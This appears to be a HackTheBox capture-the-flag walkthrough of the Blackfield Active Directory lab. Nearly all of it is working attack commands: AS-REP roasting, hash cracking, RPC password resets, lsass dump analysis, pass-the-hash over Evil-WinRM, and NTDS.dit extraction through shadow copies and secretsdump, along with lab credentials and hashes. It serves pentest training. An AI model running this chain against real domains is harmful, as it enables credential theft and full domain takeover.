
The Blackfield challenge on HackTheBox is perfect for improving your pentesting skills. You will learn how to use nmap, work with Active Directory, and escalate privileges on Windows systems using mimikatz and Evil-WinRM.
The article describes the use of ASRep Roasting to identify users, the use of RPC to change passwords and capture accounts, and the elevation of privilege using the shadow copy of NTDS.DIT.
The connection to the lab is via VPN. For security reasons, it is not recommended to use a work computer or devices with sensitive data, as the connection is to a private network with experienced information security professionals.
This machine has an IP address of 10.10.10.192, which I add to /etc/hosts.
10.10.10.192 blackfield.htb
First, open ports are scanned using a script that accepts one argument — the host address to scan:
#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1
We see a lot of open ports, but as always, let’s start with SMB.
smbmap -u anonymous -H 10.10.10.192
And the profiles$ directory is available for reading.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'2
We have a large list of possible users. We can check which users are actually present in the system. The fact is that in the case of an ASRep Roasting attack, the server has three different responses:
hash of the user’s password;
this user does not have UAF Dont Require PreAuth;
this user does not exist in the Kerberos database.
That way, we can find out who is there and who is not.
First, let’s get a list.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt
Now let’s perform ASRep-Roasting.
GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt
It was unexpected to get a hash in response. The next step is to crack it.
john support.hash -w=./tools/rockyou.txt
And we have a whole account under control. Now let’s get as much information as possible using enum4linux.
enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null
The dump produces a large list of users, but the most valuable information is the group membership. In particular, it turned out that the svc_backup account belongs to the RMU group (RID: 580), which provides remote connection via Win-RM.
The data from SMB no longer contains useful information, and LDAP also does not provide anything valuable. However, RPC turned out to be useful due to one feature. The next step is to connect to it:
rpcclient 10.10.10.192 -U support
A special feature is the ability to change the password of a user with the same privileges. This method is described in detail in the sources and has been successfully applied for the user audit2020.
setuserinfo2 audit2020 18 'ralf'
Now we start analyzing all resources and services from the beginning, because we have another controlled account.
Let’s go to SMB.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192
There is a lot to read, it is better to output all the content recursively and view it in one go.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R
In the forensic\memory_analysis folder we find, apparently, a dump of the lsass process. And from it we can get passwords using mimikatz. We download this file.
smbclient.py blackfield.local/audit2020:[email protected]
Now let’s switch to a Windows machine and use mimikatz.
Knowing the hash, we use Evil-WinRM to connect on behalf of svc_backup.
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Let’s look at the user’s groups and privileges.
We have the SeBackupPrivilege privilege. This gives us the right to create a shadow copy of the NTDS file, which contains a large amount of credentials. Once we create a copy, we cannot simply extract the required file. For this, we will need the following DLL libraries.
Let’s make a shadow copy. Let’s create a file with the following contents.
SET CONTEXT PERSISTENT NOWRITERS add volume c: alias ralfcopy create expose %ralfcopy% z:
And now let’s upload it and the downloaded libraries to the host.
Let’s perform a shadow copy.
diskshadow /s ds.txt
And we will give you the file.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
The file is encrypted, and to decrypt it you need the SYSTEM file, which is easy to obtain.
reg save HKLM\SYSTEM C:\Temp\SYSTEM
We download both files from the machine.
We extract the hashes using the secretsdump utility from the impacket package.
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Let’s connect as an administrator.
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Full control over this machine has been obtained.
The use of ASRep Roasting for user identification, RPC for password change, secretsdump from impacket for hash extraction, and working with NTDS.DIT shadow copy were demonstrated. The approaches covered showed technical competence in the field of pentesting and information security.